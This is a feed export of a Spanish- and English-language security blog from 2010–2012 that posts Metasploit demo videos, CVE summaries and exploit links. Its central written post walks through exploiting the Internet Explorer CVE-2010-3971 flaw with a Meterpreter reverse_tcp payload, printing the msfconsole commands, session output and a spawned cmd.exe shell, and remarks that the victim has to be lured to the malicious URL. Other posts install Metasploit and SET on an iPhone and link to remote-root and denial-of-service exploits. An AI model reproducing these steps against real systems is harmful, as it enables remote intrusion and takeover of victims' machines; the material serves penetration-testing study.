tag:blogger.com,1999:blog-34589691980739818262020-02-28T16:22:18.356+01:00Exploits and Security<center>The insecurity of the security.</center>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-3458969198073981826.post-17177996657905523032012-01-24T11:14:00.000+01:002012-01-24T11:14:10.680+01:00iPad 2 IOS 5.0.1 Metasploit<br /><div style="text-align: center;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/lb5WRu3EjQI" title="YouTube video player" width="480"></iframe></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-28563162281637173022011-02-10T17:18:00.002+01:002011-02-11T00:18:23.222+01:00Metasploit + Nessus + XSSF - Episode 2 - Linking Metasploit and Nessus<br /><div style="text-align: center;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/1HHGuJJidug" title="YouTube video player" width="480"></iframe></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-20505416020280147182011-02-10T14:01:00.005+01:002011-02-10T17:23:02.758+01:00Metasploit + Nessus + XSSF - Episode 1 - Installation<div style="text-align: center;"><br /><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/HAhbPs9ArbY" title="YouTube video player" width="480"></iframe></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-21749873250529596112011-01-26T16:15:00.003+01:002011-07-03T14:48:02.052+02:00Metasploitable Guide - Episode 3 - Samba Server - Root Access<div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Exploiting Samba Server with Root privilege access.</span></div><div style="font-family: inherit; text-align: left;"><br /><span style="font-size: small;">CVE 2007-2447</span><br /><span style="font-size: small;"> </span><span style="font-size: small;">The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management. </span></div><div style="text-align: justify;"></div><br /><div style="text-align: center;"></div><div style="text-align: center;"><br /><iframe allowfullscreen="" class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/1Y37FMR03pY?hd=1" title="YouTube video player" type="text/html" width="480"></iframe></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-56194384478037047842011-01-22T16:03:00.005+01:002011-07-03T14:47:29.954+02:00Metasploitable Guide - Episode 2 - PostgreSQL + SSH<div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This video show an attack on Postgresql and after, a intrusion via SSH.</span><br /><br /><span style="font-family: inherit; font-size: small;">CVE 2008-0166 </span><br /><span style="font-family: inherit; font-size: small;">OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys</span>.<span style="font-size: small;"><br /></span></div><div style="text-align: center;"><div style="text-align: justify;"><br /></div><iframe allowfullscreen="" class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/uKchtcwZOnc" title="YouTube video player" type="text/html" width="480"></iframe></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-29835789716166418132011-01-20T12:42:00.008+01:002011-07-03T14:46:51.169+02:00Metasploitable Guide - Episode 1 - distccd + privilege escalation<div style="font-family: inherit; text-align: justify;"><div style="font-family: inherit;"><span style="font-size: small;"><span class="" id="result_box" lang="en"><span class="hps" title="Haz clic para obtener traducciones alternativas">This</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">is</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">the first</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">episode of</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">a</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">series</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">of</span> <span class="hps" title="Haz clic para obtener traducciones alternativas">Metasploitable Guide</span><span class="" title="Haz clic para obtener traducciones alternativas">. Upload more episodes soon.</span><span class="hps" title="Haz clic para obtener traducciones alternativas"></span></span></span></div><div style="font-family: inherit;"><span style="font-size: small;"><span class="" id="result_box" lang="en"><span class="hps" title="Haz clic para obtener traducciones alternativas"> </span></span><span class="" id="result_box" lang="en"><span class="hps" title="Haz clic para obtener traducciones alternativas"><br />CVE 2004-2687<br />distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.<br /> </span></span></span></div><span style="font-size: small;"><span class="" id="result_box" lang="en"><span class="hps" title="Haz clic para obtener traducciones alternativas"><span style="font-family: inherit;">CVE 2009-1185</span><br style="font-family: inherit;" /><span style="font-family: inherit;">udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.</span> </span></span></span></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/ANJiPanbYFo?fs=1&hl=es_ES"> </param><param name="allowFullScreen" value="true"> </param><param name="allowscriptaccess" value="always"> </param><embed src="http://www.youtube.com/v/ANJiPanbYFo?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-66769339435115829862011-01-17T15:13:00.001+01:002011-01-20T12:32:38.305+01:00Exploiting CVE 2010-3971 in Windows 7 - VNC Controller<div style="text-align: justify;"><span style="font-family: inherit; font-size: small;">Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 7 and 8 and possibly other products, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via multiple @import calls in a crafted document.</span></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/t3i5CcUTPuE?fs=1&hl=es_ES"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/t3i5CcUTPuE?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-15906670178624675492011-01-01T12:00:00.004+01:002011-01-13T01:01:55.436+01:00Bypassing Windows 7 with SET and Metasploit - Privilege escalation<div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: inherit;">This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms</span>.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/F36Qgn_cAVo?fs=1&hl=es_ES"> </param><param name="allowFullScreen" value="true"> </param><param name="allowscriptaccess" value="always"> </param><embed src="http://www.youtube.com/v/F36Qgn_cAVo?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-24239137686182901862010-12-26T00:00:00.012+01:002011-01-19T11:39:36.589+01:00Explotando Windows 7 - 0day de Internet Explorer CVE 2010-3971 con Metasploit desde iphone 4:<br /><div style="font-family: inherit;">Explotable vía 3G o Wifi.</div><div style="font-family: inherit;">También válido para Metasploit para Windows, Linux, MacOSX.</div><div style="font-family: inherit;"><br /></div><div style="font-family: inherit; text-align: justify;">Descripción de la vulnerabilidad:</div><div style="font-family: inherit; text-align: justify;"></div><div style="font-family: inherit; text-align: justify;"><br /><span style="font-size: small;">CVE 2010-3971</span></div><div style="font-family: inherit; text-align: justify;">Vulnerabilidad de uso después de liberación en la función CSharedStyleSheet::Notify en el parseado Cascading Style Sheets (CSS) en mshtml.dll, como el usado en Microsoft Internet Explorer v7 y v8 y probablemente otros productos, permite a atacantes remotos causar una denegación de servicio (caída) y ejecutar código de su elección a través de múltiples llamadas @import en un documento manipulado.</div><div style="font-family: inherit; text-align: justify;"></div><div style="font-family: inherit; text-align: justify;">Existen varios exploits públicos, pero usaré Metasploit para nuestro ejemplo.</div><div style="font-family: inherit; text-align: justify;"></div><div style="font-family: inherit; text-align: justify;">Módulo de metasploit que utilizaremos: ms11_xxx_ie_css_import.</div><br /><pre style="background-color: black; color: white;"><code>msf > use exploit/windows/browser/ms11_xxx_ie_css_import<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set PAYLOAD windows/meter<br />preter/reverse_tcp<br />PAYLOAD => windows/meterpreter/reverse_tcp<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set SRVHOST 172.16.0.101<br />SRVHOST => 172.16.0.101<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set LHOST 172.16.0.101<br />LHOST => 172.16.0.101<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > exploit<br /><span style="color: blue;">[+]</span> Exploit running as background job.<br /><span style="color: blue;">[+]</span> Started reverse handler on 172.16.0.101:4444<br /><span style="color: blue;">[+]</span> Using URL: http://172.16.0.101:8080/gbWbMzi4</code></pre><div style="text-align: justify;"><br /></div><span style="background-color: black; color: white;"></span><code></code><br /><div style="text-align: justify;"><br /><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uLeMSHI/AAAAAAAAAF0/gcn6ECfyrnA/s400/0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uLeMSHI/AAAAAAAAAF0/gcn6ECfyrnA/s320/0.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uUbRgGI/AAAAAAAAAF4/23S3tgCITaM/s400/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uUbRgGI/AAAAAAAAAF4/23S3tgCITaM/s320/1.PNG" width="213" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ulKtNgI/AAAAAAAAAF8/faU8bbPVrT8/s400/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ulKtNgI/AAAAAAAAAF8/faU8bbPVrT8/s320/2.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_unlJLvI/AAAAAAAAAGA/pcpICa06OfM/s400/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_unlJLvI/AAAAAAAAAGA/pcpICa06OfM/s320/3.PNG" width="213" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ujEkAeI/AAAAAAAAAGE/3ssVmaMLvJA/s400/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ujEkAeI/AAAAAAAAAGE/3ssVmaMLvJA/s320/4.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_0uXawPI/AAAAAAAAAGI/ke04QakLPV8/s400/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_0uXawPI/AAAAAAAAAGI/ke04QakLPV8/s320/5.PNG" width="213" /></a></div><br /><b><u>Descripción </u></b> </div><br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-Definimos el exploits a utilizar </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">use exploit/windows/browser/ms11_xxx_ie_css_import</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-Definimos payload </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set PAYLOAD windows/meterpreter/reverse_tcp </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-Definimos donde se ejecutara el servidor (en este caso nuestro iPhone) </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set SRVHOST 172.16.0.101 </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-Definimos IP donde se conectará la víctima (en este caso nuestro iPhone)</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set LHOST 172.16.0.101</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-Ejecutamos el exploit </span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">exploit </span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span style="font-size: small;">Metasploit generará una URL maliciosa:</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Exploit running as background job.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Started reverse handler on 172.16.0.101:4444 </span></div><div style="font-family: inherit;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Using URL: http://172.16.0.101:8080/gbWbMzi4</span></div><div style="font-family: inherit;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Server started.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><pre style="font-family: inherit;"><span style="font-size: small;"><code>http://172.16.0.101:8080/</code>gbWbMzi4</span></pre><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Esa URL debe ser ejecutada por la víctima desde Internet Explorer. Existen diferentes modos de conseguirlo, pero no entraré en detalles.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Cuando la víctima acceda a la URL, aparecerá algo similar a lo siguiente:</span><br /><div style="text-align: left;"><span style="font-size: small;"><br /></span></div><div style="text-align: left;"><span style="font-size: small;">msf exploit(ms11_xxx_ie_css_import) > <span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4"</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import redirect</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4/sa1Ck.html"</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import HTML</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4/generic-1294064502.dll"</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import .NET DLL</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53761 Received request for "/gbWbMzi4/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> 172.16.0.101:53761 Sending windows/browser/ms11_xxx_ie_css_import CSS</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Sending stage (749056 bytes) to 172.16.0.101</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Meterpreter session 1 opened (172.16.0.101:4444 -> 172.16.0.101:53762) at 2011-01-03 15:21:47 +0100</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Session ID 1 (172.16.0.101:4444 -> 172.16.0.101:53762) processing InitialAutoRunScript 'migrate -f'</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Current server process: iexplore.exe (2320)</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Spawning a notepad.exe host process...</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> Migrating into process ID 2492</span></div><div style="text-align: left;"><span style="font-size: small;"><span style="color: blue;">[*]</span> New server process: notepad.exe (2492) </span></div></div><br />Conexión:<br /><pre style="background-color: black; color: white;"><code>msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > sessions -i 1</code></pre><br />Conseguir shell al sistema:<br /><code> <span style="background-color: black; color: white;">meterpreter > execute -f cmd.exe -H -i</span></code><br /><br /><br /><div style="font-family: inherit;"><span style="font-size: small;">Process 2544 created.</span></div><div style="font-family: inherit;"><span style="font-size: small;">Channel 1 created.</span></div><div style="font-family: inherit;"><span style="font-size: small;">Microsoft Windows [Versión 6.1.7600]</span></div><div style="font-family: inherit;"><span style="font-size: small;">Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span style="font-size: small;">C:\Users\Tester\Desktop></span></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-70817698264089535292010-12-25T16:00:00.004+01:002011-01-05T00:38:59.089+01:00Instalando Metasploit 3.5.1+ y SET en iPhone 4<div style="font: 12px Arial; margin: 0px;">Vía SSH</div><div style="font: 12px Arial; margin: 0px;"><br /></div><div style="font: 12px Arial; margin: 0px;">#MSF3<br /><br /></div><div style="font: 13px Arial; margin: 0px;">apt-get install subversion nano wget python</div><div style="font: 12px Arial; margin: 0px;">cd /private/var/</div><div style="font: 12px Arial; margin: 0px;">wget http://apt.saurik.com/cydia/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb</div><div style="font: 12px Arial; margin: 0px;">dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb</div><div style="font: 13px Arial; margin: 0px;">apt-get install rubygems</div><div style="font: 13px Arial; margin: 0px;">wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2</div><div style="font: 13px Arial; margin: 0px;">tar jxpf framework-3.5.1.tar.bz2</div><div style="font: 13px Arial; margin: 0px;">cd msf3</div><div style="font: 13px Arial; margin: 0px;">./msfconsole<br /><br /></div><div style="font: 13px Arial; margin: 0px;"><br />#SET</div><div style="font: 13px Arial; margin: 0px;"><br /></div><div style="font: 13px Arial; margin: 0px;">cd /private/var/</div><div style="font: 13px Arial; margin: 0px;">svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/</div><div style="font: 13px Arial; margin: 0px;">cd SET</div><div style="font: 13px Arial; margin: 0px;">./set #Aceptar la instalación de los módulos de python que nos requiera.<br /><br /></div><div style="font: 13px Arial; margin: 0px;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6iCFKOI/AAAAAAAAAE4/ojxGx8XPBoo/s400/la%20foto-2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6iCFKOI/AAAAAAAAAE4/ojxGx8XPBoo/s320/la%20foto-2.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6ugnByI/AAAAAAAAAFY/ODJb6YRXPXQ/s400/la%20foto-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6ugnByI/AAAAAAAAAFY/ODJb6YRXPXQ/s320/la%20foto-1.PNG" width="213" /></a></div><div style="font: 13px Arial; margin: 0px;"><br /></div><div style="font: 13px Arial; margin: 0px;"><br /></div><div style="font: 13px Arial; margin: 0px;">Nota: No actualizar ruby, ya que romperá la instalación.</div><div><br /></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-63068260261451611092010-12-25T13:11:00.003+01:002011-01-14T00:56:53.188+01:00Social-Engineer Toolkit (SET) v1.1 Released<div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><a href="http://security-sh3ll.blogspot.com/2010/12/social-engineer-toolkit-set-v11.html">Social-Engineer Toolkit (SET) v1.1 Released</a></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">SET v1.1 Codename: “Happy Holidays” Released</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster as well as an overall of optimizations through the entire code base. The next version 1.2 will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Lastly, another great option is I've added UPX support for the Java Applet and Payload Generator attacks. In the set_config is a new option called "UPX_ENCODE=ON", this is on by default and checks to see if UPX is in the default Back|Track path. If it's not it will automatically disable the UPX packing, otherwise it will automatically pack the executable with the UPX packer. You can turn this off in the set_config by specifying UPX_ENCODE=OFF. Enjoy the latest version of SET, there is more to come with the next 1.2 release which is currently under development.</span></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-2565204397205410752010-12-24T14:14:00.002+01:002011-01-14T13:52:11.229+01:00ProFTPD with mod_sql pre-authentication, remote root<span class="Apple-style-span" style="color: white; font-family: sans-serif; font-size: 12px;"></span><br /><span class="Apple-style-span" style="color: white; font-family: sans-serif; font-size: 12px;"></span><br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This paper describes and explores a pre-authentication remote root heap overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow, due to the how the ProFTPD heap works, and how the bug is exploited via variable substition. The vulnerability was inadvertently mitigated (from remote root, at least :( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql where you could inject SQL and bypass authentication. That vulnerability that mitigated it is documented in CVE-2009-0542. The specific vulnerability we are exploring is an unbounded copy operation in sql_prepare_where(), which has not been fixed yet. Also, I'd like to preemptively apologise for the attached code. It evolved over time in piecemeal fashion, and isn't overly pretty/readable by now.</span></div><span style="font-family: inherit; font-size: small;"><br />Full Document and Exploit <a href="http://www.megaupload.com/?d=OGC5SP63">here</a><br />Documento completo y Exploit <a href="http://www.megaupload.com/?d=OGC5SP63">aquí</a></span><span class="Apple-style-span" style="color: white; font-family: sans-serif; font-size: 12px;"><span style="background-color: white; color: black;" xmlns="http://www.w3.org/1999/xhtml"><br /></span></span>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-59770810097478898912010-12-21T23:09:00.004+01:002011-01-14T13:51:43.145+01:00Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC<div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">Esp</span></div><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">-</span></div><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">La vulnerabilidad permite provocar una denegación de servicio. Exploit con la prueba de concepto </span><span style="font-size: small;"><a href="http://www.exploit-db.com/exploits/15803/"><span class="Apple-style-span">aquí</span></a></span><span class="Apple-style-span" style="font-size: small;">.<br /></span></div><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">Eng</span></div><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">-<br />The vulnerability can cause a denial of service. Exploit the proof of concept </span><span style="font-size: small;"><a href="http://www.exploit-db.com/exploits/15803/"><span class="Apple-style-span">here</span></a></span><span class="Apple-style-span" style="font-size: small;">.</span></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.comtag:blogger.com,1999:blog-3458969198073981826.post-54647246421276229002010-12-15T09:00:00.003+01:002011-01-14T01:52:56.714+01:00Metasploit Framework 3.5.1 Released<div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Esp</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Liberada la versión 3.5.1 de Metasploit, Express Metasploit, y Metasploit Pro. Esta versión añade 47 nuevos módulos y 8 nuevos scripts desde la versión 3.5.0, para un total de 635 explotaciones, 314 módulos auxiliares y 215 utilidades. Metasploit ofrece ahora explotar SAP BusinessObjects, servidores de correo Exim, ProFTPD instalaciones de transferencia de archivos, los despliegues SCADA (BACnet, Citect, Datac), servidores Novell NetWare, Microsoft Internet Explorer y plugins tales como Flash y Java de Oracle. Se han realizado mejoras a las hazañas de Java del lado del cliente. Meterpreter ahora es compatible con la captura de cámara web, micrófono y pantalla para espionaje. Módulos de fuerza bruta, admite nombres de usuario vacío y ahora incluyen el Unix "r "de los servicios, VNC y SNMP. La importación desde Nessus plugin se ha actualizado, se ha dado soporte básico para nCircle, y ahora se puede exportar a PWDump y John the Ripper.</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Eng</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">-</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Versions 3.5.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro have gone live! This synchronized release adds 47 new modules and 8 new scripts since 3.5.0, bringing the total to 635 exploits, 314 auxiliary modules, and 215 payloads. Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. Improvements have been made to the client-side Java exploits. The Meterpreter payload now supports webcam, microphone, and screen spying. Brute force modules support empty user names and now include the Unix "r" services, VNC, and SNMP protocols. The Nessus import plugin has been updated, basic support for nCircle has been added, and the framework can now export into the PWDump and John the Ripper formats.</span></div>José Antonio Pérez (Japtron)http://www.blogger.com/profile/03741433621974456398noreply@blogger.com